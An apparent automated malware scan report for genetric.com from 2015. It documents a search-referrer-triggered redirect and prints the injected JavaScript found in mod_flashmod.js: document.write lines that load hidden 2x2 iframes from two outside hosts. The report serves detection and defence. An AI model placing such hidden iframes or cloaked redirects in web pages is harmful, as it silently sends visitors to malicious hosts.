Malicious/Suspicious Redirects
URL: http://genetric.com/ (imitation of visitor from search engine)
Request:
GET / HTTP/1.1
Host: genetric.com
Referer: http://www.google.com/search?q=redirect+check1
Server response:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 22 May 2015 12:16:48 GMT
Location: http://candice-accola.org/mocf.html?h=725350
Server: Apache
Vary: Accept-Encoding
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
Status: malicious
Scanned pages/files
Request | Server response | Status |
http://genetric.com/ | 200 OK Content-Length: 17393 Content-Type: text/html | clean |
http://genetric.com/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://genetric.com/modules/mod_flashmod/mod_flashmod.js | 200 OK Content-Length: 4093 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=725350></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wwad.html?j=725350></iframe>');
function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else < case "class": case "title": case "accesskey": case "name": case "id": case "tabindex": ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i+1]; break; default: ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i+1]; } } ret.objAttrs["classid"] = classid; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://globetask.com/wwad.html?j=725350
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wwad.html?j=725350>
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=725350
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=725350>
http://genetric.com/templates/gk_finance_com/lib/scripts/template_scripts.js | 200 OK Content-Length: 6453 Content-Type: application/javascript | clean |
http://genetric.com/templates/gk_finance_com/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 | 200 OK Content-Length: 2892 Content-Type: text/javascript | clean |
http://genetric.com/./ | 403 Forbidden Content-Length: 102 Content-Type: text/html | clean |
http://genetric.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://genetric.com/solutions.html | 200 OK Content-Length: 17678 Content-Type: text/html | clean |
http://genetric.com/solutions/unified-communication.html | 200 OK Content-Length: 18700 Content-Type: text/html | clean |
http://genetric.com/solutions/network-security.html | 200 OK Content-Length: 18361 Content-Type: text/html | clean |
http://genetric.com/solutions/wimax--wifi.html | 200 OK Content-Length: 18375 Content-Type: text/html | clean |
http://genetric.com/solutions/campus-networks.html | 200 OK Content-Length: 18468 Content-Type: text/html | clean |
http://genetric.com/solutions/ip-telephony.html | 200 OK Content-Length: 18807 Content-Type: text/html | clean |
http://genetric.com/solutions/mobile-voip.html | 200 OK Content-Length: 19011 Content-Type: text/html | clean |
http://genetric.com/services.html | 200 OK Content-Length: 17768 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=genetric.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://genetric.com/
Result: genetric.com is not infected or malware details are not published yet.